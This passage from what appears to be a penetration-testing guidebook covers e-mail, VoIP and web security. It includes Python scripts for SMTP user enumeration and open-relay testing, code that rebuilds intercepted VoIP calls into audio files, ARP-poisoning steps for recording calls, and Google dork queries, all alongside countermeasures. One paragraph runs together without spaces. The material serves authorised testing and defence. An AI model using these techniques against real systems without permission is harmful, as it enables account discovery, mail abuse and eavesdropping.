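    def cmd(self, line):
        self.sock.sendall((line + "\r\n").encode())
        return self.reply()
    def close(self):
        self.cmd("QUIT")
        self.sock.close()

def enumerate_users(host, port, users, verb="VRFY"):
    """Map each name to 'exists', 'unknown' or 'inconclusive' from VRFY/EXPN replies."""
    probe = SmtpProbe(host, port)
    probe.cmd("HELO scanner.example.net")    # the scanner's hostname is an assumption
    result = {}
    for user in users:
        code = probe.cmd("%s %s" % (verb, user))
        result[user] = ("exists" if code == 250 else "unknown" if code in (550, 551, 553)
                        else "inconclusive")  # 252, 500, 502: the server won't say
    probe.close()
    return result

def relay_accepted(host, port, mail_from, rcpt_to):
    """The manual relay test from the steps above, scripted. Use a recipient at a
    domain the server is NOT responsible for; True means the server queued it."""
    probe = SmtpProbe(host, port)
    probe.cmd("HELO scanner.example.net")
    probe.cmd("MAIL FROM:<%s>" % mail_from)
    code = probe.cmd("RCPT TO:<%s>" % rcpt_to)
    if code == 250:                          # "Relay not allowed" usually arrives here
        if probe.cmd("DATA") == 354:
            probe.sock.sendall(b"Subject: relay test\r\n\r\nA relay test!\r\n.\r\n")
            code = probe.reply()
    probe.close()
    return code == 250
```

Against a real server, replace start_fake_server() with the target's host and port. As the steps above say, a True from relay_accepted() is only confirmed when the message actually turns up in the outside mailbox, because some filters accept the DATA and silently drop the message afterwards.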
Countermeasures against SMTP relay attacks
You can implement the following countermeasures on your e-mail server to disable or at least control SMTP relaying:
Disable SMTP relay on your e-mail server. SMTP relay should be disabled by default. However, it pays to check. If you don't know whether you need SMTP relay, you probably don't. You can enable SMTP relay for specific hosts on the server or within your firewall configuration.
Enforce authentication if your e-mail server allows it. You might be able to require password authentication on an e-mail address that matches the e-mail server's domain. Check your e-mail server and client documentation for details on setting up this type of authentication.
E-mail header disclosures
If your e-mail client and server are configured with typical defaults, a malicious attacker might find critical pieces of information:
Internal IP address of your e-mail client machine (which can lead to the enumeration of your internal network and eventual exploitation via phishing and/or subsequent malware infection)
Software versions of your client and e-mail server along with their vulnerabilities
Hostnames that can divulge your network naming conventions
Testing
Figure 14-10 shows the header information revealed in a test e-mail I sent to my free web account. As you can see, it shows off quite a bit of information about my e-mail system:
The third Received line discloses my system's hostname, IP address, server name, and e-mail client software version.
The X-Mailer line displays the Microsoft Outlook version I used to send this message.
Figure 14-10: Critical information revealed in e-mail headers.
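As an added illustration (not from the book), the following Python 3 snippet applies the same reading of headers to a constructed message: it unfolds each Received, X-Mailer and similar header, flags hosts whose bracketed address falls in an RFC 1918 range, pulls product and version strings, and then shows the gateway-side countermeasure of dropping the identifying headers and the internal Received hops. The message, hostnames, addresses and version numbers are all made up, and the product-name regex is a heuristic you would extend for your own MTA.

```python
import ipaddress
import re
from email import message_from_string

# Constructed test message: every host, address and version here is invented
# to resemble the disclosures described above; nothing is from a real system.
SAMPLE_MESSAGE = """\
Received: from mx.example.net (mx.example.net [203.0.113.5])
\tby mail.freewebmail.example (Postfix) with ESMTPS id 4AB12C
\tfor <user@freewebmail.example>; Mon, 01 Feb 2016 10:00:00 +0000
Received: from EXCH01.corp.example.net (exch01.corp.example.net [10.1.2.3])
\tby mx.example.net with Microsoft SMTP Server (TLS) id 15.1.225.42
Received: from WKS-KBEAVER.corp.example.net ([192.168.10.57])
\tby EXCH01.corp.example.net with Microsoft SMTP Server id 15.1.225.42
From: kbeaver@corp.example.net
To: user@freewebmail.example
Subject: header test
X-Mailer: Microsoft Outlook 16.0

test body
"""

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
FROM_CLAUSE = re.compile(r"\bfrom\s+([\w.-]+)\s*\(([^)]*)\)")      # "from HOST (... [ip])"
IP_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
# Heuristic: a known product name followed (before the next ';') by a dotted version.
VERSION_HINT = re.compile(r"(Microsoft SMTP Server|Microsoft Outlook|Postfix|Sendmail|Exim)\b"
                          r"[^;]*?(\d+(?:\.\d+)+)")

def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)

def header_disclosures(raw_message):
    """Return (header, kind, detail) tuples for internal hosts and software versions."""
    msg = message_from_string(raw_message)
    findings = []
    for name, value in msg.items():
        value = " ".join(value.split())            # unfold continuation lines
        for host, paren in FROM_CLAUSE.findall(value):
            for ip in IP_IN_BRACKETS.findall(paren):
                if is_internal(ip):
                    findings.append((name, "internal host", "%s [%s]" % (host, ip)))
        for product, version in VERSION_HINT.findall(value):
            findings.append((name, "software version", "%s %s" % (product, version)))
    return findings

def scrub_headers(raw_message):
    """One gateway-style countermeasure: drop the client-identifying headers and
    every Received line that names a private address (the internal hops)."""
    msg = message_from_string(raw_message)
    for header in ("X-Mailer", "User-Agent", "X-Originating-IP"):
        del msg[header]
    kept = [r for r in msg.get_all("Received", [])
            if not any(is_internal(ip) for ip in IP_IN_BRACKETS.findall(r))]
    del msg["Received"]
    for r in kept:
        msg["Received"] = r                        # re-added at the end; order is cosmetic here
    return msg.as_string()
```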
Countermeasures against header disclosures
The best countermeasure to prevent information disclosures in e-mail headers is to configure your e-mail server or e-mail firewall to rewrite your headers, by either changing the information shown or removing it. Check your e-mail server or firewall documentation to see whether this is an option.
If header rewriting is not available (or even allowed by your ISP), you still might prevent the sending of some critical information, such as server software version numbers and internal IP addresses.
Capturing traffic
E-mail traffic, including usernames and passwords, can be captured with a network analyzer or an e-mail packet sniffer and reconstructor.
Mailsnarf is an e-mail packet sniffer and reconstructor that's part of the dsniff package (http://sectools.org/tool/dsniff). There's a great commercial (yet low-cost) program called NetResident (www.tamos.com/products/netresident), too. You can also use Cain & Abel (www.oxid.it/cain.html) to highlight e-mail-in-transit weaknesses. I cover password cracking using this tool and others in Chapter 8.
If traffic is captured, a hacker or malicious insider can compromise one host and potentially have full access to another adjacent host, such as your e-mail server.
Malware
E-mail systems are regularly attacked by such malware as viruses and worms. One of the most important tests you can run for malware vulnerability is to verify that your antivirus software is actually working.
Before you begin testing your antivirus software, make sure that you have the latest virus software engine and signatures loaded.
EICAR offers a safe option for checking the effectiveness of your antivirus software. Although EICAR is by no means a comprehensive method of testing for malware vulnerabilities, it serves as a good, safe start.
EICAR is a European-based malware think tank that has worked in conjunction with anti-malware vendors to provide this basic system test. The EICAR test string transmits in the body of an e-mail or as a file attachment so that you can see how your server and workstations respond. You basically access (load) this file—which contains the following 68-character string—on your computer to see whether your antivirus or other malware software detects it:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
You can download a text file with this string from www.eicar.org/86-0-Intended-use.html. Several versions of the file are available on this site. I recommend testing with the Zip file to make sure that your antivirus software can detect malware within compressed files.
When you run this test, you may see results from your antivirus software similar to Figure 14-11.
Figure 14-11: Using the EICAR test string to test antivirus software.
In addition to testing your antivirus software, you can attack e-mail systems using other tools I cover in this book. Metasploit (www.metasploit.com) enables you to discover missing patches in Exchange and other servers that hackers could exploit. Brutus (www.hoobie.net/brutus) enables you to test the cracking of web and POP3/IMAP passwords.
General best practices for minimizing e-mail security risks
The following countermeasures help keep messages as secure as possible.
Software solutions
The right software can neutralize many threats:
Use anti-malware software on the e-mail server—better, the e-mail gateway—to prevent malware from reaching e-mail clients. Cloud-based e-mail systems such as those offered by Google and Microsoft often have such protection built in. Using malware protection on your clients is a given.
Apply the latest operating system and e-mail server security patches consistently and after any security alerts are released.
Encrypt (where it's reasonable). You can use S/MIME or PGP to encrypt sensitive messages or use e-mail encryption at the desktop level or at the server or e-mail gateway. An easier means is to use TLS on the transport via the POP3S, IMAPS, and SMTPS protocols (or STARTTLS on the standard ports). Keep in mind that transport encryption protects a message only between one hop and the next; it sits in the clear on every mail server in between, so it doesn't replace S/MIME or PGP where the content itself must stay private. The best option may be to use an e-mail security appliance or cloud service that supports the sending and receiving of encrypted e-mails via a web browser over HTTPS.
Don't depend on your users to encrypt messages. As with any other security policy or control, relying on users to make security decisions often ends poorly. Use an enterprise solution to encrypt messages automatically instead.
Make sure that encrypted files and e-mails can be protected against malware. Encryption doesn't keep malware out of files or e-mails. You just have encrypted malware within the files or e-mails. Encryption keeps your server or gateway anti-malware from detecting the malware until it reaches the desktop.
Make it policy for users not to open unsolicited e-mails or any attachments, especially those from unknown senders, and create ongoing awareness sessions and other reminders. Plan for users who ignore or forget about the policy of not opening unsolicited e-mails and attachments. It will happen!
Operating guidelines
Some simple operating rules can keep your walls high and the attackers out of your e-mail systems:
Put your e-mail server behind a firewall on a different network segment from the Internet and from your internal LAN—ideally in a demilitarized zone (DMZ).
Harden by disabling unused protocols and services on your e-mail server.
Run your e-mail server and perform malware scanning on dedicated servers if possible (potentially even separating inbound and outbound messages). Doing so can keep malicious attacks out of other servers and information in the event the e-mail server is hacked.
Log all transactions with the server in case you need to investigate malicious use. Be sure to monitor these logs as well! If you cannot justify monitoring, consider outsourcing this function to a managed security services provider.
If your server doesn't need certain e-mail services running (SMTP, POP3, and IMAP), disable them—immediately.
For web-based e-mail, such as Microsoft's Outlook Web Access (OWA), properly test and secure your web server application and operating system by using the testing techniques and hardening resources I mention throughout this book.
Require strong passwords. Be it standalone accounts or domain-level Exchange or similar accounts, any password weaknesses on the network will trickle over to e-mail and surely be exploited by someone via Outlook Web Access or POP3. I cover password hacking in Chapter 8.
If you're running sendmail—especially an older version—consider running a secure alternative, such as Postfix (www.postfix.org) or qmail (www.qmail.org).
Understanding Voice over IP
A widely used technology in enterprises today is Voice over IP (VoIP). Whether it's in-house VoIP systems or systems for remote users, VoIP servers, softphones, and other related components have their own set of security vulnerabilities. Like most things security-related, many people haven't thought about the security issues surrounding voice conversations traversing their networks or the Internet—but it certainly needs to be on your radar. Don't fret—it's not too late to make things right. Just remember, though, that even if protective measures are in place, VoIP systems need to be included as part of your overall security testing strategy on a continuous basis.
VoIP vulnerabilities
As with any technology or set of network protocols, the bad guys are always going to figure out how to break in. VoIP is certainly no different. In fact, given what's at stake (phone conversations and phone system availability), there's certainly a lot to lose.
VoIP-related systems are no more (or less) secure than other common computer systems. Why? It's simple. VoIP systems have their own operating system, they have IP addresses, and they're accessible on the network. Compounding the issue is the fact that many VoIP systems house more intelligence—a fancy word for "more stuff that can go wrong"—which makes VoIP networks even more hackable.
If you want to find out more about how VoIP operates, which will undoubtedly help you root out vulnerabilities, check out VoIP For Dummies by Timothy V. Kelly.
On one hand, VoIP systems have vulnerabilities very similar to other systems I cover in this book, including
Default settings
Missing patches
Weak passwords
That's why using the standard vulnerability scanning tools I cover is important. Figure 14-12 shows various vulnerabilities associated with the authentication mechanism in the web interface of a VoIP adapter.
Figure 14-12: A WebInspect scan of a VoIP network adapter showing several weaknesses.
Looking at these results, apparently this device is just a basic web server. That's exactly my point—VoIP systems are nothing more than networked computer systems that have vulnerabilities that can be exploited.
On the other hand, two major security weaknesses are tied specifically to VoIP. The first is that of phone service disruption. Yep, VoIP is susceptible to denial of service just like any other system or application. VoIP is as vulnerable as the most timing-sensitive applications out there, given the low tolerance folks have for choppy and dropped phone conversations (cell phones aside, of course). The other big weakness with VoIP is that voice conversations are usually not encrypted and thus can be intercepted and recorded. Imagine the fun a bad guy could have recording conversations and blackmailing his victims. This is very easy on unsecured wireless networks, but as I show in the upcoming "Capturing and recording voice traffic" section, it's also pretty simple to carry out on wired networks.
If a VoIP network is not protected via network segmentation, such as a virtual local area network (VLAN), then the voice network is especially susceptible to eavesdropping, denial of service, and other attacks. But the VLAN barrier can be overcome in many environments by using a tool called VoIP Hopper (http://voiphopper.sourceforge.net). Just when you think your voice systems are secure, a tool like VoIP Hopper comes along. Gotta love innovation!
Unlike typical computer security vulnerabilities, these issues with VoIP aren't easily fixed with simple software patches. These vulnerabilities are embedded into the Session Initiation Protocol (SIP) and Real-time Transport Protocol (RTP) that VoIP uses for its communications. The following are two VoIP-centric tests you should use to assess the security of your voice systems.
It's important to note that although SIP is the most widely used VoIP protocol, there is H.323. So, don't spin your wheels testing for SIP flaws if H.323 is the protocol in use. Refer to www.packetizer.com/ipmc/h323_vs_sip for additional details on H.323 versus SIP.
Scanning for vulnerabilities
Outside the basic network, OS, and web application vulnerabilities, you can uncover other VoIP issues if you use the right tools. The good news is that you likely already have these tools at your disposal in the form of network vulnerability scanners such as Nexpose (www.rapid7.com/products/nexpose) and web vulnerability scanners such as Netsparker (www.netsparker.com). Common flaws in the VoIP call managers and phones include weak passwords, cross-site scripting, and missing patches that can be exploited using a tool such as Metasploit.
Kali Linux has several VoIP tools built in via Applications/Vulnerability Analysis/VoIP Tools. Other free tools for analyzing SIP traffic are PROTOS (www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/index.html) and sipsak (www.voip-info.org/wiki/view/Sipsak). A good website that lists all sorts of VoIP tools is www.voipsa.org/Resources/tools.php.
Capturing and recording voice traffic
If you have access to the wired or wireless network, you can capture VoIP conversations easily. This is a great way to prove that the network and the VoIP installation are vulnerable. There are many legal issues associated with tapping into phone conversations, so make sure you have permission and are careful not to abuse your test results.
You can use Cain & Abel (technically just Cain for the features I demonstrate here) to tap into VoIP conversations. You can download Cain & Abel free at www.oxid.it/cain.html. Using Cain's ARP poison routing feature, you can plug into the network and have it capture VoIP traffic:
1. Load Cain & Abel and then click the Sniffer tab to enter the network analyzer mode.
The Hosts page opens by default.
2. Click the Start/Stop APR icon (which looks like the nuclear waste symbol).
The ARP poison routing process starts and enables the built-in sniffer.
3. Click the blue + icon to add hosts to perform ARP poisoning on.
4. In the MAC Address Scanner window that appears, ensure that All Hosts in My Subnet is selected and then click OK.
5. Click the APR tab (the one with the yellow-and-black circle icon) to load the APR page.
6. Click the white space under the uppermost Status column heading (just under the Sniffer tab).
This step re-enables the blue + icon.
7. Click the blue + icon and the New ARP Poison Routing window shows the hosts discovered in Step 3.
8. Select your default route or other host that you want to capture packets traveling to and from.
I just select my default route, but you might consider selecting your SIP management system or other central VoIP system. The right column fills with all the remaining hosts.
9. In the right column, Ctrl+click the system you want to poison to capture its voice traffic.
In my case, I select my VoIP network adapter, but you might consider selecting all your VoIP phones.
10. Click OK to start the ARP poisoning process.
This process can take anywhere from a few seconds to a few minutes depending on your network hardware and each host's local TCP/IP stack.
11. Click the VoIP tab and all voice conversations are "automagically" recorded.
Here's the interesting part—the conversations are saved in .wav audio file format, so you simply right-click the recorded conversation you want to test and choose Play, as shown in Figure 14-13. Note that conversations being recorded show Recording… in the Status column.
Figure 14-13: Using Cain & Abel to capture, record, and play back VoIP conversations.
The voice quality with Cain and other tools depends on the codec your VoIP devices use. With my equipment, I find the quality is marginal at best. That's not really a big deal, though, because your goal is to prove there's a vulnerability—not to listen in on other people's conversations.
There's also a Linux-based tool called vomit (http://vomit.xtdnet.nl)—short for voice over misconfigured Internet telephones—that you can use to convert VoIP conversations into .wav files. You first need to capture the actual conversation by using tcpdump, but if Linux is your preference, this solution offers basically the same results as Cain, outlined in the preceding steps.
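What Cain and vomit are doing at the bottom of the stack is simple enough to show in a few dozen lines. The following Python 3 example is an addition, not code from the book or from either tool: it parses the 12-byte RTP header of each captured UDP payload, drops anything that isn't RTP (the SIP INVITE in the constructed sample), groups packets by SSRC, orders them by sequence number, and wraps the concatenated G.711 audio in a WAV container without decoding it (WAV format tag 7 is u-law, 6 is A-law). The capture is constructed inline; the SSRC values, sequence numbers and 160-byte payloads are made up, and the sort ignores 16-bit sequence wrap-around, which a real reconstructor must handle.

```python
import struct
from collections import defaultdict

RTP_HEADER = struct.Struct("!BBHII")   # V/P/X/CC, M/PT, sequence, timestamp, SSRC
PCMU, PCMA = 0, 8                       # static payload types for G.711 u-law / A-law

def parse_rtp(packet):
    """Parse one RTP packet (a UDP payload); returns a dict, or None if it isn't RTP v2."""
    if len(packet) < RTP_HEADER.size:
        return None
    b0, b1, seq, ts, ssrc = RTP_HEADER.unpack_from(packet)
    if b0 >> 6 != 2:                    # version field must be 2
        return None
    cc, padding, ext = b0 & 0x0F, b0 & 0x20, b0 & 0x10
    offset = RTP_HEADER.size + 4 * cc   # skip the CSRC list
    if ext:                             # extension: 16-bit profile, 16-bit length in 32-bit words
        offset += 4 + 4 * struct.unpack_from("!HH", packet, offset)[1]
    payload = packet[offset:]
    if padding and payload:             # last byte says how many pad bytes (itself included)
        n = payload[-1]
        payload = payload[:-n] if n else payload
    return {"pt": b1 & 0x7F, "marker": bool(b1 & 0x80), "seq": seq,
            "ts": ts, "ssrc": ssrc, "payload": payload}

def reassemble_streams(packets):
    """Group G.711 packets by SSRC, order by sequence number, concatenate the audio.
    Returns {ssrc: (payload_type, audio_bytes)}."""
    streams = defaultdict(list)
    for pkt in packets:
        p = parse_rtp(pkt)
        if p and p["pt"] in (PCMU, PCMA):
            streams[p["ssrc"]].append(p)
    out = {}
    for ssrc, lst in streams.items():
        lst.sort(key=lambda p: p["seq"])   # naive: does not handle 16-bit wrap-around
        out[ssrc] = (lst[0]["pt"], b"".join(p["payload"] for p in lst))
    return out

def g711_wav(audio, payload_type, rate=8000):
    """Wrap raw G.711 samples in a WAV container with no decoding: format tag 7 (u-law)
    or 6 (A-law), mono, 8 bits per sample. Most players accept this without a fact chunk."""
    fmt_tag = 7 if payload_type == PCMU else 6
    fmt = struct.pack("<HHIIHH", fmt_tag, 1, rate, rate, 1, 8) + struct.pack("<H", 0)  # + cbSize
    data = b"data" + struct.pack("<I", len(audio)) + audio
    riff_len = 4 + (8 + len(fmt)) + len(data)
    return (b"RIFF" + struct.pack("<I", riff_len) + b"WAVE"
            + b"fmt " + struct.pack("<I", len(fmt)) + fmt + data)

def make_rtp(seq, ts, ssrc, payload, pt=PCMU, marker=False, ext=b""):
    """Build a packet for the constructed capture below (and for exercising the parser)."""
    b0 = 0x80 | (0x10 if ext else 0)
    hdr = RTP_HEADER.pack(b0, pt | (0x80 if marker else 0), seq, ts, ssrc)
    if ext:
        hdr += struct.pack("!HH", 0xBEDE, len(ext) // 4) + ext
    return hdr + payload

# Constructed capture: two u-law streams (one per direction) arriving out of order,
# plus one SIP datagram that a sniffer would see on the same segment.
SAMPLE_CAPTURE = [
    make_rtp(1001, 160, 0x11111111, b"\xff" * 160),
    make_rtp(1000, 0, 0x11111111, b"\x7f" * 160, marker=True),
    make_rtp(5000, 0, 0x22222222, b"\x00" * 160, marker=True),
    b"INVITE sip:bob@example.com SIP/2.0\r\n",
    make_rtp(1002, 320, 0x11111111, b"\x80" * 160),
]
```

To use it on real traffic you would feed it the UDP payloads from a tcpdump or scapy capture and write the returned bytes to a .wav file; any codec other than G.711 (G.729, for example) would have to be decoded first, which is why the voice quality the text mentions depends on the codec in use.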
If you're going to work a lot with VoIP, I highly recommend you invest in a good VoIP network analyzer. Check out Savvius' OmniPeek (formerly WildPackets)—a great all-in-one wired and wireless analyzer (www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis)—and TamoSoft's CommView (www.tamos.com/products/commview), which is a great low-priced alternative.
These VoIP vulnerabilities are only the tip of the iceberg. New systems, software, and related protocols continue to emerge, so it pays to remain vigilant, helping to ensure your conversations are locked down from those with malicious intent. Like I've said before, if it has an IP address or a URL, it's fair game for attack.
Countermeasures against VoIP vulnerabilities
Locking down VoIP can be tricky. You can get off to a good start, though, by segmenting your voice network into its own VLAN—or even a dedicated physical network if that fits into your budget. Further isolate any Internet-connected systems so that not just anyone can connect to them (I see this often). You should also make sure that all VoIP-related systems are hardened according to vendor recommendations and widely accepted best practices (such as NIST's SP 800-58 document at http://csrc.nist.gov/publications/nistpubs/800-58/SP800-58-final.pdf) and that software and firmware are patched on a periodic and consistent basis. Where your phones and call manager support it, enable SIP over TLS for signaling and SRTP for the media; that is what takes the recording attack described above off the table even when the segmentation fails.
Web Applications and Mobile Apps
In This Chapter
Testing websites and web applications
Uncovering flaws in mobile apps
Protecting against SQL injection and cross-site scripting
Preventing login weaknesses
Manually analyzing software flaws
Countering web abuse
Analyzing source code
Websites and web applications are common targets for attack because they're everywhere and often open for anyone to poke and prod. Basic websites used for marketing, contact information, document downloads, and so on are especially easy for the bad guys to play around with. Commonly used web platforms such as WordPress and related content management systems are especially vulnerable to attack because of their presence and lack of testing and patching. For criminal hackers, websites that provide a front end to complex applications and databases that store valuable information, such as credit card and Social Security numbers, are especially attractive. This is where the money is, both literally and figuratively.
Why are websites and applications so vulnerable? The consensus is that they're vulnerable because of poor software development and testing practices. Sound familiar? It should; this same problem affects operating systems and practically all aspects of computer systems, including automobiles and related Internet of Things (IoT) systems. This is the side effect of relying on software compilers to perform error checking, questionable user demand for higher-quality software, and emphasizing time-to-market and usability over security.
This chapter presents security tests to run on your websites, applications, and mobile apps. Given all the custom configuration possibilities and system complexities, you can test for literally thousands of software vulnerabilities. In this chapter, I focus on the ones I see most often using both automated scanners and manual analysis. I also outline countermeasures to help minimize the chances that someone with ill intent can carry out these attacks against what are likely considered your most critical business systems.
I want to point out that this chapter merely skims the surface of all possible software security flaws and ways to test for them. Additional sources for building your web security testing skills are the tools and standards, such as the Top 10 Web Application Security Risks and Top 10 Mobile Risks, provided by the Open
Choosing Your Web Security Testing Tools
Good web security testing tools can help ensure that you get the most from your work. As with many things in life, I find that you get what you pay for when it comes to testing for web security holes. This is why I mostly use commercial tools in my work when testing websites and web applications for vulnerabilities.
These are my favorite web security testing tools:
Acunetix Web Vulnerability Scanner (www.acunetix.com) for all-in-one security testing, including a port scanner and an HTTP sniffer
AppSpider (www.rapid7.com/products/appspider) for all-in-one security testing including excellent capabilities for authenticated scanning
Netsparker (www.netsparker.com) for all-in-one security testing that often uncovers vulnerabilities the other tools do not
Web Developer (http://chrispederick.com/work/web-developer) for manual analysis and manipulation of web pages
Yes, you must do manual analysis. You definitely want to use a scanner, because scanners find around half of the issues. For the other half, you need to do much more than just run automated scanning tools. Remember that you have to pick up where scanners leave off to truly assess the overall security of your websites and applications. You have to do some manual work not because web vulnerability scanners are faulty, but because poking and prodding web systems simply requires good old-fashioned hacker trickery and your favorite web browser.
You can also use general vulnerability scanners, such as Nexpose and LanGuard, as well as exploit tools, such as Metasploit, when testing websites and applications. You can use these tools to find (and exploit) weaknesses at the web server level that you might not otherwise find with standard web-scanning tools and manual analysis. Google can be beneficial for rooting through web applications and looking for sensitive information as well. Although these non-application-specific tools can be beneficial, it's important to know that they won't drill down as deep as the tools I mention in the preceding list.
Seeking Out Web Vulnerabilities
Attacks against vulnerable websites and applications via Hypertext Transfer Protocol (HTTP) make up the majority of all Internet-related attacks. Most of these attacks can be carried out even if the HTTP traffic is encrypted (via HTTPS, also known as HTTP over SSL/TLS) because the communications medium has nothing to do with these attacks. The security vulnerabilities actually lie within the websites and applications themselves or the web server and browser software that the systems run on and communicate with.
Many attacks against websites and applications are just minor nuisances and might not affect sensitive information or system availability. However, some attacks can wreak havoc on your systems, putting sensitive information at risk and even placing your organization out of compliance with state, federal, and international information privacy and security laws and regulations.
Manual analysis required
It cannot be stressed enough how important it is to perform manual analysis of websites and applications using a good, old-fashioned web browser. You most certainly can't live without web vulnerability scanners, but you better not depend on them to find everything because they won't. Common web security vulnerabilities that you must check for include:
Specific password requirements, including whether or not complexity is enforced
Whether or not intruder lockout works after so many failed login attempts
Whether or not encryption (ideally Transport Layer Security [TLS] Version 1.2) is used to protect user sessions, especially logins
User session handling, including confirming that session cookies are changed after login and logout and whether or not sessions time out after a reasonable period of time
File upload capabilities and whether malware can be uploaded to the system
You don't necessarily have to perform manual analysis of your websites and applications every time you test, but you need to do it periodically—at least once or twice a year. Don't let anyone tell you otherwise!
Directory traversal
I start you out with a simple directory traversal attack. Directory traversal is a really basic weakness, but it can turn up interesting—sometimes sensitive—information about a web system. This attack involves browsing a site and looking for clues about the server's directory structure and sensitive files that might have been loaded intentionally or unintentionally. Note that this is a different problem from the path traversal input flaw (the ../ sequences that coax an application into reading files outside the web root); here the files are simply published where anyone who looks can find them.
Perform the following tests to determine information about your website's directory structure.
Crawlers
A spider program, such as the free HTTrack Website Copier (https://httrack.com), can crawl your site to look for every publicly accessible file. To use HTTrack, simply load it, give your project a name, tell HTTrack which website(s) to mirror, and after a few minutes, possibly hours (depending on the size and complexity of the site), you'll have everything that's publicly accessible on the site stored on your local drive in C:\My Web Sites. Figure 15-1 shows the crawl output of a basic website.
Figure 15-1: Using HTTrack to crawl a website.
Complicated sites often reveal a lot more information that should not be there, including old data files and even application scripts and source code.
Inevitably, when performing web security assessments, I stumble across .zip or .rar files on web servers. Sometimes they contain junk, but oftentimes they hold sensitive information that shouldn't be there for the public to access. One project in particular stands out. When I ran across a .zip file and tried to open it, WinZip asked me for a password. Using my handy-dandy .zip file password-cracking tool from ElcomSoft (see Chapter 8 for details on password cracking), I had the password in mere milliseconds. Inside the .zip file was an Excel spreadsheet containing sensitive patient healthcare information (names, addresses, Social Security numbers, and more) that anyone and everyone in the world could access. In situations like this, your business might be required to notify everyone involved that their information was inadequately protected and possibly compromised. It pays to know the laws and regulations affecting your business. Better yet, make sure users aren't posting improperly secured sensitive information on your web servers in the first place!
Look at the output of your crawling program to see what files are available. Regular HTML and PDF files are probably okay because they're most likely needed for normal web usage. But it wouldn't hurt to open each file to make sure it belongs there and doesn't contain sensitive information you don't want to share with the world.
Google
Google, the search engine company that many love to hate, can also be used for directory traversal. In fact, Google's advanced queries are so powerful that you can use them to root out sensitive information, critical web server files and directories, credit card numbers, webcams—basically anything that Google has discovered on your site—without having to mirror your site and sift through everything manually. It's already sitting there in Google's cache waiting to be viewed.
The following are a couple of advanced Google queries that you can enter directly into the Google search field:
site:hostname keywords—This query searches for any keyword you list, such as SSN, confidential, credit card, and so on. An example would be:
site:www.principlelogic.com speaker
filetype:file-extension site:hostname—This query searches for specific file types on a specific website, such as doc, pdf, db, dbf, zip, and more. These file types might contain sensitive information. An example would be:
filetype:pdf site:www.principlelogic.com
Other advanced Google operators include the following:
allintitle searches for keywords in the title of a web page.
inurl searches for keywords in the URL of a web page.
related finds pages similar to this web page.
link shows other sites that link to this web page.
Specific definitions and more can be found at www.googleguide.com/advanced_operators.html. Many web vulnerability scanners also perform checks against the Google Hacking Database (GHDB) site www.exploit-db.com/google-hacking-database.
When sifting through your site with Google, be sure to look for sensitive information about your servers, network, and organization in Google Groups (http://groups.google.com), which is the Usenet archive. I have found employee postings in newsgroups that reveal too much about the internal network and business systems—the sky is the limit. If you find something that doesn't need to be there, you can work with Google to have it edited or removed. For more information, refer to Google's Contact us page at www.google.com/intl/en/contact.
Looking at the bigger picture of web security, Google hacking is pretty limited, but if you're really into it, check out Johnny Long's book, Google Hacking for Penetration Testers (Syngress).
Countermeasures against directory traversals
You can employ three main countermeasures against having files compromised via malicious directory traversals:
Don't store old, sensitive, or otherwise nonpublic files on your web server. The only files that should be in your /htdocs or DocumentRoot folder are those that are needed for the site to function properly. These files should not contain confidential information that you don't want the world to see.
Configure your robots.txt file to prevent search engines, such as Google, from crawling the more sensitive areas of your site. Keep in mind that robots.txt is only a request that well-behaved crawlers honor, and it is publicly readable, so it doubles as a map of what you consider sensitive. Treat it as a courtesy to search engines, not as an access control.
Ensure that your web server is properly configured to allow public access to only those directories that are needed for the site to function. Minimum privileges are key here, so provide access to only the files and directories needed for the web application to perform properly.
Check your web server's documentation for instructions on controlling public access. Depending on your web server version, these access controls are set in
The httpd.conf file and the .htaccess files for Apache (See http://httpd.apache.org/docs/current/configuring.html for more information.)
Internet Information Services Manager for IIS
The latest versions of these web servers have good directory security by default so, if possible, make sure you're running the latest versions.
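As an added example (not from the book), here is what those Apache access controls look like in httpd.conf, with the permissive form commented out beside the corrected one. The paths, the private admin directory and the 10.0.0.0/8 range are assumptions; the syntax is Apache 2.4.

```apache
# Weak: directory listings on, per-directory overrides on, whole tree readable.
# <Directory "/var/www/html">
#     Options Indexes FollowSymLinks
#     AllowOverride All
#     Require all granted
# </Directory>

# Corrected: no listings, no .htaccess overrides, only the published tree granted.
<Directory "/var/www/html">
    Options -Indexes +FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>

# Nothing outside the published tree is reachable even if a path leaks.
<Directory "/">
    Options None
    AllowOverride None
    Require all denied
</Directory>

# Old data files and archives (the .zip and .rar finds described above) are refused
# outright, so a crawler gets 403 rather than the file.
<FilesMatch "\.(zip|rar|7z|tar|gz|bak|old|sql|xls|xlsx|csv)$">
    Require all denied
</FilesMatch>

# Administrative area: restricted by source address rather than hidden in robots.txt.
<Directory "/var/www/html/admin">
    Require ip 10.0.0.0/8
</Directory>
```

After changing the configuration, run the crawl from the Crawlers section again; the archive and backup files should disappear from the mirror, and requests for them should appear in the error log as 403s rather than 200s in the access log.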
Finally,considerusingasearchenginehoneypot,suchastheGoogleHackHoneypot(http://ghh.sourceforge.net).Ahoneypotdrawsinmalicioususerssoyoucanseehowthebadguysareworkingagainstyoursite.Then,youcanusetheknowledgeyougaintokeepthematbay.
Input-filtering attacks
Websites and applications are notorious for taking practically any type of input, mistakenly assuming that it's valid, and processing it further. Not validating input is one of the greatest mistakes that web developers can make.
Several attacks that insert malformed data (often, too much at one time) can be run against a website or application, which can confuse the system and make it divulge too much information to the attacker. Input attacks can also make it easy for the bad guys to glean sensitive information from the web browsers of unsuspecting users.
Buffer overflows
One of the most serious input attacks is a buffer overflow that specifically targets input fields in web applications.
For instance, a credit-reporting application might authenticate users before they're allowed to submit data or pull reports. The login form uses the following code to grab user IDs with a maximum input of 12 characters, as denoted by the maxlength attribute:
<form name="Webauthenticate" action="www.your_web_app.com/login.cgi" method="POST">
…
<input type="text" name="inputname" maxlength="12">
…
A typical login session would involve a valid login name of 12 characters or fewer. However, maxlength is enforced only by the browser. It can be changed to something huge, such as 100 or even 1,000, or removed altogether, and then an attacker can enter bogus data in the login field. What happens next is anyone's call: if the server-side code copies the input into a fixed-size buffer without checking its length, the application might hang, overwrite other data in memory, or crash the server.
